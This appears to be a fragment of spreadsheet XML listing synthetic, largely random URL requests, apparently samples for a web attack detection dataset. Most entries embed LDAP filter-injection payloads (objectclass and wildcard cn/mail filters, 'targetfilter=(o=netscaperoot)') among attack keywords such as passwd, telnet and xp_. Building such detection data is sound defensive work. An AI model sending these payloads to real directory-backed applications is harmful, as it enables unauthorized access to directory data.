    <t>/hcoquubtkbq/affv5_x_kiwaetckx/jz4lordk9wi/oyy/ceciwsm.cfm?wetneorhsvtm=281661829&amp;-ndiv_sock_streamjcw6j_=ucwcsy&amp;ro8gwaje=88)(&amp;(objectclass=ptl)(|(sn++++=++++1fo)(cn=e5+++++j*))&amp;ek=nk33satwfdr5o&amp;ys3=y+otmpeupobefe&amp;aeheidiioshu7d3=ik6ap-l&amp;g33orbs3raeehmw=rhhsnte&amp;yctea5uwh=aeghu&amp;edstrftyntbi=rsock_streamt&amp;cslweexet7s=4&amp;nmsm=l99an&amp;d@-ggconnect.vj=t8mhaysluspttqr+x</t>
  </si>
  <si>
    <t>/lxesz3ggth_p6m8wil0-/iboaz/eb7s/ryuza0ri0171rqt/6kwmbxdo0xakaxf/waw/txjrybfew_@/en1tallosvme6g@y.swf?imateiaoc=048223&amp;zahi=)(++|(+cn=*o+'brien*++++)(mail=*o++'brien*+)++</t>
  </si>
  <si>
    <t>/ttek2smst7ial/0gc1pre/tjwhsk/lvjv1o/42hbwrfgkfj2h8/amdelete9httpx/cftrrlbzorkga7y/uywrh1fl3zrlc.mdb?eemsd=8e&amp;eji4aiit8t=9eiautoexechdtr:se9h2c&amp;qknm1zx4=$cypasswd&amp;eh=fed+&amp;tercnpntgt=exmllo&amp;iynribbrntt=527&amp;an=t'ate7aextds52i&amp;etar=b6er:teaallc&amp;ykete=bcj)(+|++++(n3l=*)&amp;fjen@sjg=51&amp;fyhaaeaecofarha=45910&amp;8tler=853879</t>
  </si>
  <si>
    <t>/d3wt/izkuab6tw2pn39sa/py7mailvxdvjstylejl12/i@a4t/lmd/izoistdgldwxt3/aheesrzswnismk/se/fj6tibj657kce_nj5/cai/pqscriptscexeckyoa.js?asnknr=qum&amp;eanteourh=8991702419&amp;tndenhroqmea7o=atrolequow1&amp;l4e3dbdo=rpeeteiq++nttbetween=rfor&amp;h2=xc&amp;aneso3=oa$y'&amp;0g9eesi=6173553425&amp;olt99qbtvwhere=)+++(+|++(xrh=evi7u*)&amp;1bv5f=obunwhtoeliet&amp;ula=+tt[daah5echosaeulb&amp;ypjoe=ghnsy</t>
  </si>
  <si>
    <t>/ciotrsviikao/5eoilaakv0/dy/keteoih1t2l.mdb?h7irn9tpeitrro=)+++(+|(++cn=*o+'brien*)(mail++++=*o++'brien*+)+</t>
  </si>
  <si>
    <t>/evr/igdhxfqvke-j.wus/imitdedea.jpeg?rmmaspcf=xhnen2rspoes&amp;7ri=hjrldejaz2&amp;rosotet=t4v&amp;duv=c]o6r&amp;4da8wr=brtio4fowdo&amp;4ueanitw=qfxye.hwuf&amp;nsthotrxonh=00ylsame@ydiernh&amp;linsbyxereey=)(++++|(yq=fa*)&amp;gqm2t4eda6yw=da6</t>
  </si>
  <si>
    <t>/ltn48detre9ghiitozv/yayaernwrxu/jsbkpecz-ox-.gif?ao8sir8=/ehtpassuiichildt&amp;ics4h=+md&amp;rdawof6=tc_1w6&amp;oh7h=lr&amp;at2se=6307&amp;ptseyoeonurnr=39lsgsujto&amp;8ro=3at&amp;oeteeshlasgttra=0pcdtenhoia&amp;kdf1.iyhf0=~%ipsg&amp;5w82slbdgceqi=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ndhivwn.ro2.jpg?ter=7251521065&amp;kl7oigniirfa=et)(+|++(xo=*)&amp;erlauiesba=delete7ereieeoalhsehyhaving&amp;hsadtderbspl=orcs1_&amp;q3q00ajka=inclrttctsss&amp;m1wzyoz5pa=e/g&amp;rutmrsrodah=meec&amp;pprocessing-instruction6mk=075324397</t>
  </si>
  <si>
    <t>/k_ty7y08wji/w5zccpta4_6/httpt/mpjp83njesqwuohfa@sl/ntdrpehu/rtdrfbekt.mspx?uiay0gti=51&amp;r4r=uav&amp;i3c=td3&amp;qcyai=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/uihattrc/meeer1im/wmqsv39xatmw_zall/ea8yn4zh1lvm4bzh/iuatc8mcg_s/sdubz8an.3gteel/ndd6/3bfid/t28uhwl/ysui2nnetteozjatie.tiff?n1=pas&amp;1rdlrbagwm=heeurb&amp;faa=+mut&gt;itcgkkr&amp;sp3inoerkd=14391&amp;mw8byservicesze_yp=2387)(&amp;(objectclass=ica)(|(sn++++=+++oxtg)(cn=lre++++j*))&amp;lxxma8ue=qyvvqefjl9i&amp;i9=0zetz5&amp;-vzy=91152&amp;ljmaad=llon&amp;formpoaxwbgb=brnrsucel&amp;in0laixshidox=ro&lt;imispmetaf</t>
  </si>
  <si>
    <t>/rvf0elofpmxk./f-b2lnl5yswid/rm4cr/ud/ads7/ixfv/khwjcr.png?ihtenatwnkeav=26468806&amp;no=8095)(&amp;(objectclass=ehed)(|(sn+=nonw)(cn=gr+j*))&amp;ose=f$tk8@acceptnopene&lt;d&lt;sp0tnwh&amp;84aiodao00nrhy=es8rblrm0to&amp;y9dbs=7&amp;nlnsmt9y=w@swgyq4&amp;ryhelaohrnger=7thkebnie$w63&amp;usie8e=864742019&amp;ydor56flike0=8398&amp;u5ih=+7e-e&amp;s0i=?tmailqvbscript-lss0aaqevalr&amp;qoc42d%uc-log=77&amp;cn=ns&amp;w8nlaccept6connect1tmpsck=rnfsensser;ea&amp;baudho1u02done=ithsaefset</t>
  </si>
  <si>
    <t>/izbxfo_br6tvfj/lzds.9ygdpm/t71pggzbm-cuz0swrnxy/higfcmsutsat4i0fspns/cjed9weeflen/-mx/k-6ts/0f1uw-6y1uw.jfmac/j1sh/z1pwec/eh.php?49prwrotrhcud=491)(&amp;(objectclass=ro0w)(|(sn=++++te5)(cn=r+++j*))&amp;isxhaejunt=:sua6ie</t>
  </si>
  <si>
    <t>/nczddhieeu/e6zwprs7lsmylfnn/qi/aenp83isrf1m/isvkyhlftpo5q2z0v/cydrop_@q/n6oh0mtz8gaj/dbzni350qcx6rei_uw/ssarus2mnch/jtori/le6o68eae.php?scstst=t6)(&amp;(objectclass+=++un*)</t>
  </si>
  <si>
    <t>/fhnh_wbflke_ojj.cgi?mem=es4&amp;woiateos=4&amp;t9v=42981&amp;nhtsut=")(targetfilter=(o=netscaperoot))&amp;hq=1200&amp;keebadrok4=5thrinnstsinhykc&amp;wrl2d7ondnoo=ioyn&amp;tiezne2eiiltq=39547&amp;aeee=3060</t>
  </si>
  <si>
    <t>/biw0ecwc/iredefchteo/xxdeusnwp/mocha0ad4/ydzhnph-su2m0sam/mza28kh-mjvor/passthruvarqsallpoimgk0aoyonull/ljr/uuo.html?cmstge=seaorseohar&amp;nnz=1944197&amp;a5eyeoe3etenog=raeilncignmp&amp;kjbeu.-ucsystem=selsaofi?br=eu&amp;rceii1rm=-9&amp;on3=uie?&amp;rtohdnml6=nullnpsa&amp;sifaxueen=hxe)(+++|(u7n2f=*)&amp;tjsgyest7ohe=hsifeueoi0di@</t>
  </si>
  <si>
    <t>/cs-a8o/hor/ay_o_9/tas/5kdpcu/det_9n2/ur9btrl.htm?utft9=7693493&amp;okqptmp=9648&amp;egt=)++++(++|++++(dgl=yooar*)</t>
  </si>
  <si>
    <t>/.hvl4ppnedbr/mesry2tcginp/cinhtpassrctyamav/6n4ujt4iyl5/esiaxb4sue.shtml?ygjfhysqjk=stsp)(&amp;(objectclass++=+ei*)&amp;xiaibui=4061204</t>
  </si>
  <si>
    <t>/eena/ateoggdiaatfdhed/rabeanhwp/mftitwuyhrcint0wdoi/t-4cawn/smaharcw4cvhmoohgs/fqqwhtrqr/yjqsdcct/imgy_s2y/soeifwed.css?1syilnvled=it7h)(++|++++(xo=*)&amp;42gads=ipcnmruofthcmd&amp;tndw=ed4a</t>
  </si>
  <si>
    <t>/dfizs/y7aolp/rmer/7stdnyup5ztete/7k6v.dll?ozvapretyejrh6=o+n&amp;lianiy3=hnu1%h1we&amp;ctl0sx=5190&amp;xvm1inuvsamjv=-ednphewc3-s;nh&amp;tzq@l=3588&amp;edpb=+7+tq7os&amp;qoecsb=)++(+++|(+++cn=*o'brien*)(mail+++=*o'brien*++++)++&amp;rcpqvg_wht=4409072&amp;eqonlmtbin=3</t>
  </si>
  <si>
    <t>/bpa.dll?9ktbrmochajb4=4133&amp;0fum=73872188&amp;aoj9mwoaqnj2=697422&amp;inez9ub6vcr6=910)(&amp;(objectclass=cgnt)(|(sn=4hs)(cn=onge+++j*))</t>
  </si>
  <si>
    <t>/ench/dh2khejp/i1saaifstssqie/reern/iebhe5pno3tpd/3cf_t/8blxcq8fssdc@n.swf?esgbnt=hrr&amp;daitdc=509341180&amp;childm6vgbetcziavm=gws3a&amp;tnsf2nakbco=)+++(+++|++++(++++cn=*o++++'brien*++)(mail+=*o+'brien*++)+&amp;dwvsnqx3=doopenenreplacerosqore</t>
  </si>
  <si>
    <t>/sepeeroga/oyd2jsztx/opcq75lqui7rzww/i3li794phc/cp3-qrrzr0dp/sreiiasn.bin?8ccndfgji_=)(+|++++(++++cn=*o++++'brien*++++)(mail++=*o++++'brien*++)++++&amp;ieo=r&amp;1t7=2</t>
  </si>
  <si>
    <t>/wdeoe/1ncownif/voftsef@r4fb/pxyltl/d3uterrsdebfoo5s/eaipa8/iekunv0dv7v/tlpsty99ey_l3666ufr/er/qstylevfwa.aspx?wct=rxq&gt;/@onhextie&amp;tti0airos=)+(|++(++++cn=*o+++'brien*+++)(mail=*o++'brien*+++)+&amp;wfhokig7=2955911541&amp;7rtbkgh2omji=843286076&amp;i1nsgxie=06&amp;nslm3r59she=eavuz</t>
  </si>
  <si>
    <t>/ebaair9lailee/i285n0/c1fg/rtldcaloitlo7/wdamozco4g/7azy7xp_nz.nsf?ayat4tstcrs=dauink&amp;nreeetp=)+++(++++|(displayname=had*)(name++++=++had*++++)(+++mail=had*+++)&amp;mc=axtteteor&amp;thttp0pxhttp2o=252871&amp;oseraadqt=u'wmuhwtc&amp;aersoe=purwbnenlc5zh</t>
  </si>
  <si>
    <t>/smz690mlmv/eiu2rj_hirxvg/asrimndfloysriase/jetnponhw/e_r/ldtioimn3/hfozs4urd/gcnit.gif?dlssrh1=r4ha1&amp;7u6gaattr=opt|envlreepmb&amp;cmtta=28&amp;sii5eoemunemdat=nic)(&amp;(objectclass=+++ei*)&amp;2ip7haqmod1=aur2z9rthire&amp;olgrdhnev=gqexec7gai&amp;eideebrozory7=i55ero&amp;iiirm3=rsppg@k&amp;ggaioe=30377231&amp;edrhe=isetep&lt;1aeufl&amp;nsdjiss=5502441&amp;xzi5=577325</t>
  </si>
  <si>
    <t>/tgphqk@/m3gepkavem-ni/tonbh/ez43jy/ts35lbtluegt4nofh4/dnc/eddf1aae5eoi2hncoar/trm/2l/iorisiosaaes/aswatj1jdkqyo7/nlzy9h_25.exe?olm07rn7oddats=477)(&amp;(objectclass=sahe)(|(sn=+eogi)(cn=4+j*))&amp;ni=n+e+f:trtbsnarcp6&amp;tlchpcse=305876</t>
  </si>
  <si>
    <t>/mte9jna/2k0z22gyrhcjhtrgp.i.shtml?tuce=o5t2zav&amp;ade7pdtontu=)+(++++|(rria=9lcse*)&amp;nesrdeoh7pt7s=iaspst</t>
  </si>
  <si>
    <t>/szb/@kj63/npdotooet/thurfqf9141z4mvkt/fcopyia/0fjhozlqflbayv/icyxc1p_2nl2koovme/jandnimgq_srd/na9/frioora5waiuao/6varbgoawindow.openzt./adbnlqfsadgehz1fneth.html?euilie2legmd=)++(+++|++(+cn=*o++++'brien*++)(mail++++=*o++'brien*+)++++&amp;at=hnrehsws6q&amp;vcoe=iupdateoq+s5+z4xn&gt;tis&amp;vrree0sd=27682821</t>
  </si>
  <si>
    <t>/wbgvclbgru.rabfjs2v/jesednmlaer/ovutf7pt2kvxmfe69.php4?ietetliho=in)(&amp;(objectclass=++vg*)</t>
  </si>
  <si>
    <t>/a85/ngmrz/eudu7xfress_.wz/o5dienigbfeplcuat/im/mlzz/ceel/qgxr/asjteh5prtr.js?eo5eii8ia4le2m=86552&amp;fbef=2oaeseti&amp;jbth-autoexece@dc=)+(+++|++(cn=*o'brien*+)(mail++++=*o++'brien*+++)+++&amp;conath3nwnioaha=rmryste?:ekgi)opositionttcopy</t>
  </si>
  <si>
    <t>/rointy8k0x-2/u8irgha5ktqq2/aru9h5yiiewaoz/2ir/o4tihwerybint8ead/nrj/te/nj8-v3qv92itapmoz/iuti.tiff?arnwtye=dbee)(&amp;(objectclass++++=iiad*)&amp;naasj=oob&amp;d&amp;ne5stwnesrssae=6677</t>
  </si>
  <si>
    <t>/tepts/jyqautoexecvg4lu/h9hzttegzsepaatwat9o/ejwlfzexypmhexa/om@p/cuz-nkk3bsybrtboj/actwi/tyqnxywao2/yihmlhhek-jjf.png?lozanelnunere3u=e0dieia2kcen&amp;cdmtot9hnafmur=747&amp;cd4xzwheres=+kt&amp;esstylewinntradmin=)++(|+++(cn=*o++'brien*++)(mail++++=*o+++'brien*++)++++&amp;trtx7ideemxiriz=64</t>
  </si>
  <si>
    <t>/s2/3tmm_k9h/uzlthex1d6thrnsdoi/li5sx9ql5cujywq/pealatbrndctct.gif?utkehue6atwt=6415248&amp;ltyeppeddfes=pheetazrabi&amp;tgag=tga&amp;tittaoeoips=glc&amp;udq-7dhmochaj4sps=127&amp;ehguan6dn1=nrihnan0wracd&amp;2p=)++(|++++(displayname=had*)+++(name++=+++had*++++)(+++mail=had*++)&amp;cir5rtbtimes=cklwltef7ht&amp;tnuitosrlpavpm=hh</t>
  </si>
  <si>
    <t>/yeudv@mgi319at/vcdn/jliehtholsoapiseoapo/tcflqmo7waohhf.r/eh/t28inpopsale/sxscriptckboot.inimps2/oq3copyjbgsounday.css?tolle3zaallj=t&amp;ehrise=h(&amp;mesle=s2i6jfugf13i&amp;zieqyetmocha1pgu=)++(++++|++(awe=i4dfn*)&amp;rs=obc5eiahavingpassthrut?&amp;bteorlodhe=46&amp;vhodniat=aosjv88&amp;llacceptg=745&amp;btlyrro2it=rnud</t>
  </si>
  <si>
    <t>/rrw7@ungrvsip/4s3ea8/8v/ulfdqhqpiq-pb-xtpyfy/ydbh2ufl-r4bp4yg0b/euntephqwonbtnt6t/pf4alvw8hgf/cqahc-4xhzhzghkf/olt/kwndhg.htm?liytznspaizfs=288645&amp;tblmerwq8rltlgt=3557&amp;g5k_homegm=bhmz7-.-&amp;vg3wlocationn=nhhsa)(&amp;(objectclass+++=+++tisn*)&amp;1lbgjne7b2=5ouhts&amp;eonw=730&amp;hnaitdneswpt=allh+&amp;9vtmrerl=atbxanautoexecgi0</t>
  </si>
  <si>
    <t>/yj/e4stdv2trootsonxlb/xtsh/oagobmbgmjs/nsantnteevidvl6hu/9gko4/nvwn2jsjgjffhfvqfz/stn2svlydcvuh-c06l/iq/tsock_streamghw0like/igchagsyc/4_o.b.x.cgi?nfn24kwurbe=83)(&amp;(objectclass=en7s)(|(sn++=++++srw)(cn=r++j*))&amp;ota0e6own=5293&amp;sgt3scw=+0ntinuc</t>
  </si>
  <si>
    <t>/cbum6.html?fjg1xg1dxs=exn.&amp;vbscriptv8ftplb9cy=7&amp;ikjgiehrme=t\\=+=&amp;httpsiscggb=)++(|++++(ti=tvbn*)</t>
  </si>
  <si>
    <t>/1tygon6dbytgas/eiau5potq2-9u/seqw_hxiuh8urear0/ogcxoiribnf9ayw3m13/ys/c9auiaspattntwdxes/iczpme.dmr5d/hd4dot.gif?11hi4tkiudoh=t8m]e&amp;dotyftustetgfs=mljl)(++|++++(aotai=*)&amp;rqagmwpqa=aubedndosim</t>
  </si>
  <si>
    <t>/wavurrosuran/eyneqpnl7ctiod/cwfdi5rtnona9so/cv/cyadminnph-lhl_6/9tjahjfyjr9a.cgi?yhoh=alj3rpj0&amp;xxs3g0eris=tuiqn9hnuos&amp;erekarceirri=5154819&amp;54n=)++++(+|++(++++cn=*o++'brien*++)(mail+++=*o+++'brien*)&amp;oais6pnhsist3=(vep&amp;9e3smrtwtd=9&amp;rab=4e&amp;ibsrqclo7teeakn=t0dh&amp;tmpmqc=idmcog+pbeval?ix6copyc&amp;gaaca7n=nsem8reet4a&amp;mmxxterm@aq72e=]allisma+c&lt;'n&amp;nso=o+</t>
  </si>
  <si>
    <t>/ans8tkzu/psdcztagy/ddd/is/f2zsfyvozchmdme/onntassa7sernooewe/4ri6dnw4divf6.xf6/h9fhnvne7c5r/p@r-bjoa/wa_n-.jpg?fr=cnu)(&amp;(objectclass++=++++sedo*)&amp;wtbantee=re&amp;ncwixnte=ned9s&amp;bsyugqio=+o=d&amp;foru=ne+oc&amp;ak8arno=systemr+alllheuitac5&amp;sg=34&amp;igevrtimted=hgto9oe&amp;naeheotsnyehrl=eaeduiss&amp;9r2djttceussa=ttsntkape8ej&amp;77=passwdsdrop~n7uem&amp;tqspfxdconnect@updater=qgsfnmndiwefbthdb&amp;engqsumiiaast=715854</t>
  </si>
  <si>
    <t>/osnnrehvj4e2fmdc/nf/bfxusst-qs/s4qn/foptlfbolknw5/i4qx-hoopenogz/ccawenidmdnih/hqq0ng@hq2/eosqbvt0lrlsenen/twwyg7n4zf9_taopw/hruenyb/natorct.htm?zvsslalc=560&amp;bnifgels7=731147005&amp;hee3oeno2snitat=92&amp;yqjusroh=ecin7oic3ul&amp;gmetbfti2absgae=9264&amp;aey4iddsnoielo=tmph(e"ajnnfxi\\s+0&amp;jf_.rcg8rm=)+++(|++++(nrs=iom*)&amp;ibqqbg2h4=hsietnesme23rx6eh&amp;e0uitesuist=rrrrr6hyya&amp;dcc=th|eyiand=&amp;ikt=7&amp;jaia=5eolyo&amp;e9thzclai2h=898224</t>
  </si>
  <si>
    <t>/we3xfoopn_r/k37sul9sl0t.shtml?nmrtetuloei=8wmi)(&amp;(objectclass+=++++texx*)&amp;vz@e1b=9gv7&amp;g0opt1twnh=nyhtelnetautaeicmh2&amp;g1ehtoyzwir3lh=nedsedrerwrna1eneu</t>
  </si>
  <si>
    <t>/hpasswdj6cfv81lkhaving/duluhngzvzrdpiyiu7/u@gp7khn6xmt9/b3fbodyatobh35.jpg?rmzfotfi=dn18letmptnna/ynmyetelnetq&amp;rtroalod=et&amp;auiaeeofogeee=esls&amp;eeel[9io&amp;saa93vc=dt&amp;rkaznocmp=+amailanull&amp;he=oplen4irunapo&amp;h2aje=knp_cmqef&amp;i0elk=cls@nnjeprocessing-instruction9o&amp;nm=0222)(&amp;(objectclass=ttsv)(|(sn++++=+ip)(cn=e++j*))&amp;5reed2=;3@qnhnte&amp;yteca=61566584&amp;xtn6dftipni8iu=oawbqstf69v&amp;iphshomsd=wwa9atdii(s</t>
  </si>
  <si>
    <t>/jb/r6/jik7g40kwzs5s/ets/ho7e-azotyt.@dvc/rmcrk/ju351q6s_yav/hri01si/i1zownap4dkm75fh1x/o12wfscriptj2a/htiteyaope.bin?9voegi9n6miit=fzqo.accznae&amp;attneiceahand=)++++(+++|++++(+cn=*o++++'brien*++++)(mail++++=*o+'brien*++++)+++&amp;gxsio=ar+i?dze3oas&amp;nnew=vjsock_streameh&amp;n7a2vomte9hari=varot7ntdivnehrlsam&amp;oomsnrecrtelt=sxa039r53&amp;@.ag4@yjn4g=iriihcsi&amp;fymr=positionfqy</t>
  </si>
  <si>
    <t>/ihf0ng_-vw/5lcc@.fiframef7dwl/0q@z0d9nwsip/h_dbudocl9ej/shutdownzzd8fijonph-le@-/open@_tp8y8h/eglvackjsock_stream5-xqv/.6@@7access_log3.gif?e9acmdbtk4=sefaq&amp;xhzm=annhgj&amp;rqknjcv=)+++(+|++++(eetto=nh*)&amp;clihs=6612204&amp;wtxz5d8='ta</t>
  </si>
  <si>
    <t>/lteildyhob5eb/ifhokeabwwv/dli_cechoadmin.jsp?hjeksnsilkn=r3o@f&amp;nusno=796&amp;enahpaw5a6=ehed&amp;rye=vwwh&amp;tssnigaohta=)+++(++++|++++(displayname=had*)+(name+++=++++had*)(+++mail=had*++)&amp;iis=ijahg</t>
  </si>
  <si>
    <t>/nqy.znx/tibzqlkfk9ay3wfbdix.mdb?ketmxsn=76419&amp;wleetgore=n9window.openm&amp;4brtcltoedbge2=89372&amp;y11cx_bin=r4t&amp;q5nhlp1zlf=350159&amp;seiidie=laotg2trdsutt6ntnr&amp;slnoe=6_eaybcbrw&amp;d9erbss=mjr/dijn)hrae]&amp;pboisgs=7061)(&amp;(objectclass=lom)(|(sn+=+++g3hr)(cn=nrgw+++++j*))&amp;rbet1a=6856383102&amp;atbu=usketiarmnoezk|&amp;ncat7@=9aepr8e&amp;esyeph5poy=da&amp;eagtft=mspassthrua&amp;nsq=div2childtadre&lt;e</t>
  </si>
  <si>
    <t>/oeuea/in5u0h@peanlkti/hnae/lzkvcqefruldwgfs/rvx@/axl4nfrrejgooyfzc.jpeg?ndkzcsadtimorso=232637&amp;art7=c6dbody&lt;+froma&amp;oat=5411924214&amp;tea0mnis=btoqieusrrht&amp;glsnoiloi=pnss&amp;tninemtsci=34&amp;ee6nmls=9585)(&amp;(objectclass=ns8)(|(sn++++=++++ho0)(cn=cy+++j*))&amp;ijjwbk4cpeths=edvbscriptf&amp;iat=tgxx34v&amp;retx7r=09&amp;ddoo=fu)ti&amp;xmzrv6oandsyu=daritnxuctnebksl</t>
  </si>
  <si>
    <t>/autbow1_i/iauinedlatin/an@-8f9gj_yqb/t0e.-blxtmpmv/1depuros8gxqic.gif?ataewee=4781)(&amp;(objectclass=ils)(|(sn+=+++fc)(cn=s+++j*))&amp;gluondlf7n=wudar&amp;larxshi=oohonwrmeeolcrc&amp;eooaerbugiycsii=1</t>
  </si>
  <si>
    <t>/rr2ocoofw3ebuiaz/mbtj-r4vq/nt775nrbjeahn/oa/ndroform8/enenkteosfaihcihs0rr/nstosrilnnshmsk/9nyin/exya/eyndoetzawe/ls_xum/crzt@7.mdb?orsfeicdvairem5=netef&amp;wiosd=37&amp;duvihrn=4056)(&amp;(objectclass=npze)(|(sn+++=+++a8)(cn=3+++++j*))&amp;emrn=grirs&amp;esctlwcurtwzke=00931&amp;44zhkm=961&amp;noym=fn&amp;necrgsr=70744&amp;j6stylesl.ujsamk8=ntec&amp;xhrcopy=wst&amp;tnednd0nbdsmcr=e</t>
  </si>
  <si>
    <t>/ateersmm4zslu.htm?u2rz47os6i2o=)(|++++(hisd=oke*)&amp;tue63eao3ul6=ryni</t>
  </si>
  <si>
    <t>/eea/efrp/trsaiudcmutt5b/bciurmwk/cieafhtfghan6z/egldtgeaeo5eittetai/hr-.dll?taihedw=j\\ahjdg&amp;6ebocny6osa=87449684&amp;dg=4984&amp;nra=ihncqtift1brrnta&amp;ddropnk=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/s9de666/ei/noniha1/ttumdh/vsreplacec28/mjnle-q/pts0l9d13bbhtc/mxjqb.0yd_/nrt_xopgn/eoftvnene50e/3yz0ksbscoptgc@/dy6fxtmdukoa31e.cfm?ptqtelnetkinweq=mcs0mddeuw&amp;09g_ueval8j%u=)++(+++|+(displayname=had*)++++(name++=+had*+++)(++mail=had*)&amp;amt=t+h&amp;2706jzxconnect8xe=6idt5ensoa5dtnduu&amp;i4oienos=c8o&amp;atlsemwgeij=or&amp;utrurtr&amp;oalyttghw0tr7=wer1dzemvaainebd6p&amp;cn=5</t>
  </si>
  <si>
    <t>/iwezjskttcs.html?7orstyleppuum=422)(&amp;(objectclass=fsas)(|(sn+=++c8f)(cn=fwn0+j*))&amp;bw=102482454</t>
  </si>
  <si>
    <t>/ro/2btcw9stdinotmpp@/4rnsy/i4b6x5_g-zbu/hyw7il4ch0o-s/lwurzbjgosanku4p/rbxmnwvwic2f.jpeg?ethhtdtot4shoin=6575)(&amp;(objectclass=lo1)(|(sn++++=++on)(cn=ta+++j*))&amp;ttgi=mi+oustte&amp;9knph-nmt4n=5534704&amp;drwestea=2&amp;xp_bte=erfaxehaccess_logeers9$&amp;vtatteat=02&amp;o7nsgtrs9ryi=zaurd7e4i&amp;l0pong=cdeneeustcr0</t>
  </si>
  <si>
    <t>/aurnt2cth7ahz/lzbcssnthsjzwvzlc/tf3epxhr/nnexeczw/bcds/ltht9yrosssd/vtt7tx9p1r020.swf?yf=)+++(|++(+cn=*o++'brien*+)(mail++++=*o+++'brien*+++)&amp;paxiblhe=574407&amp;tsopieineioe=1838165&amp;iloszstn6eoenii=b37%s&amp;xo71xp_9acceptg2=ifpy&amp;szhintneibsnewt=4qcat</t>
  </si>
  <si>
    <t>/htiedv2rdleihre/rzjroxxi5cql_/0qdocumentvwexec.mcduc/t-q3vbfdpbahhs_ac/dliigsimtehnrbs/or2hgztgmqtmpzom/jvpsnefwb7dd@.jsp?zsxafo1i=3668&amp;h2lm=iobjectc6&amp;rha5fztpheej=500741442&amp;hrecaaa1b=grwpxeerks&amp;hsgtimvainsec=oqsv5&amp;rdg1aieci=tf2sa1q6l4&amp;0t4=9&amp;ovckkutreplacejb==r0e&amp;im508tywaey8=gah+der|ooef&amp;tfbumsqw0=iolcidr&amp;odsite6=0i)(&amp;(objectclass=+t1s*)&amp;ef=oohih</t>
  </si>
  <si>
    <t>/llaentopsster/log1.xyo1x/tytziawsoeeomdxwvtlq/dndtaascehpnwd/otwnha.htm?tnle2eoo2euu=+hai&amp;aeeh=260&amp;5sva5c3yij=iysna&amp;vap1iisbsgtx=tt)(++|(iacsr=*)&amp;qteenbhzu2fcg6r=lser</t>
  </si>
  <si>
    <t>/tliketrfievwc/elspxqswifpbrhtpassh/uq/1jtxmlatebc/raftscript6pghr/iv2sn3x6iuht/my.mspx?randz@xume=vbscriptmsh&amp;&amp;0houenrslt3t5=+ro6&amp;ai5winnthtpasskkarqm=ct)(+|++(ad7o=*)&amp;iroc1v=9&amp;lsfieieoqsbi=d40ehknx1&amp;idthm5txtahc=tl&amp;l5ihawiteoo2eg=ybs3nhk2&amp;es=an+y&amp;w5=h@3h5jqgu&amp;seafb6=?t</t>
  </si>
  <si>
    <t>/sphmocha5/likmtwajqjs_d06ng/eioa/v2hpb36it/rnt76quares7opo0ceae/av5qmiqscriptme3ao/hrtdt/lk_zeyo0qmk/s7jd..css?9seewltnskle=rwhconnectkuhtpassh%h$g;ej&amp;tvmme0oatm7ers=wftbk4wsf&amp;jpuhdjscript4hd=ht&amp;re=")(targetfilter=(o=netscaperoot))&amp;h5tbr9mt9dnoe=1tw1rqgmnm&amp;xp_exfgqy0fn=e7orhe0eisoidd5&amp;b22lgwinntnj=t8w+x&amp;svtonese3syat=609837&amp;bl9srenet=c</t>
  </si>
  <si>
    <t>/hr7vv8gaqkkwbwk5l.php4?pca=39899749&amp;7teers=)+++(++|(displayname=had*)+++(name=++++had*++)(mail=had*+)&amp;eadissveuuersr=79&amp;esd08ysovxct=gumh&amp;tdlko=225586&amp;eitefrdahebnmqr=(ihoeanhtpass(b&amp;g9i3ff=59&amp;0ueigewrre=cxnspyx&amp;zoflweahr7n=ttn</t>
  </si>
  <si>
    <t>/xxyal6x/sqqkldxj-7ss/mkb5y_xdwurafpz-dxni/dgtjc5dxom2owb3/erho5ba/ynimdatins.css?fmmreagr=lwjityl&amp;otr=cn70deseh&amp;ee51dztaonmtet=)++(++|++++(cu=mz7e*)</t>
  </si>
  <si>
    <t>/hicx9iaeebj3hnbee/oet61hte6/snccssbmocatreeui/z@/cposition/i0ea.asmx?gb7e=7814)(&amp;(objectclass=equ)(|(sn=+l9je)(cn=srir++++j*))</t>
  </si>
  <si>
    <t>/o2@g6qta.s/otlaiit/5ero1fe0/cse/-nwtt19-cp/xx/nec08gm4ylivfje/qwn-ku3llm/sdrntjhdteoi/oylf_qn3s_/s9syletzbhe.php4?0sjzwscriptvxeqpw=3768)(&amp;(objectclass=inin)(|(sn++++=++ren)(cn=cnoq+++j*))&amp;6t5rle46=trry</t>
  </si>
  <si>
    <t>/2rhwmsyailrceoolih/dhjomlrvj.tiff?won1maotsrpeank=5192532&amp;ohetnohtweg=;iem++0alinky]sock_streamdriml+\\s&amp;5tdtntze9plhv7=")(targetfilter=(o=netscaperoot))&amp;ajhae7aq=t2mo&amp;1ut3teak=eriinn7gp2itt+&amp;ekwnleanz=f&amp;xbvrglsjt=392&amp;eplmfiwnadia=systemon%&amp;tr=oorcp+ofsng</t>
  </si>
  <si>
    <t>/khnce1ots2ase/qufluspjodrg8-qs/aurvfhbtuea.css?eeeooioehdabave=126)(&amp;(objectclass=yin)(|(sn+++=+++msln)(cn=iude+j*))&amp;wso=67560</t>
  </si>
  <si>
    <t>/uirhk2xf_rvr1djh/rh/7oxnea4xinc2/hgwiestadviahh/iyizj-k/cxvecq_adb/cnctt1mx5c3uv/lia.y68ugufz1_nh/rrenariaaaon/rcawbllimhowparda7/jgaheoegt1moo9amd/hhbawien7aersy1qa.msf?sinoiwreq=wwx&amp;sfjfyuavlon=e@&amp;yma=kes&amp;tlrfritrfdu=sfpy1be&amp;ia=+ssir&amp;2idgttubdtovotl=feth&amp;owlucimochagc=nedonieoetfkascaa&amp;ia0c9sntbea=8824&amp;9buzsxx=winnttr]7&amp;eebrohdnneoewan=cthdl)(&amp;(objectclass=++2e*)&amp;laooeghphebfdn=]pba</t>
  </si>
  <si>
    <t>/0psnhiowpbzy/ltutdnre/bhw02sk_pmocha/g84@@.jsp?pfi9lzjo6=shtcmriltore8isai&amp;1etaiaa9ra3kit=;=0+en&amp;plsrx1j=0&amp;rilesnela=3heeitidfbetweendt&amp;kmiil=)++++(+|+(eeart=l6mte*)&amp;tsh1r=patetkb+mh+eomo2o3&amp;vjtusdocumentcdstyleservices.e=3&amp;eoieeacelc2r6t=??noy+yihgelhdd0echop&amp;esj=wp-otmhabts</t>
  </si>
  <si>
